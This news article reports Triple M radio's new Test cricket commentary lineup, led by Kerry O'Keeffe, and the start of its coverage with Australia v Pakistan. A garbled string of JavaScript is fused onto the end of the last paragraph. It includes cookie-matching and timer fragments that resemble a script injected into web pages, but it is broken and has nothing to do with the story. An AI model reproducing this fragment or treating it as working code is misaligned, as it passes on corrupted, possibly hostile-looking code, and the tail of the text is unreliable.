Radio station Triple M has announced a star studded commentary team, as it gets ready to launch its Test cricket coverage.

Triple M, known for its AFL and NRL coverage and its rock music, will now venture into cricket, as it tries to gain a substantial summer audience and lure listeners away from ABC Radio, long associated with Australian cricket.

Triple M's coverage will be led by much loved Australian cricket commentator, Kerry O'Keeffe.

He will be joined by James Brayshaw, Michael Slater, Brett Lee, Brad Haddin, Merv Hughes, Darren Hughes and former England women's cricketer, Isa Guha.

FoxSports' Neroli Meadows will also be part of the coverage.

Funny men H.G Nelson, Jules Schillerand, Lawrence Mooney and Gus Worland and will also form part of the broadcast.

“It's the first time cricket will be heard on radio in crystal clear stereo, not drowned out by the fuzz and interference from powerlines and buildings. In all seriousness, we can't wait to hear this lineup together on FM. It's very exciting," Triple M head of content, Mike Fitzpatrick.

Triple M will begin its coverage when Australia take on Pakistan in the first of three Tests, beginning on December 15. "(/([.$?*|{}()[]\/+^])/g,"\$1")+"=([^;]*)"));(U[1]):"",();||void 0===time){/1e3+86400),.('')}
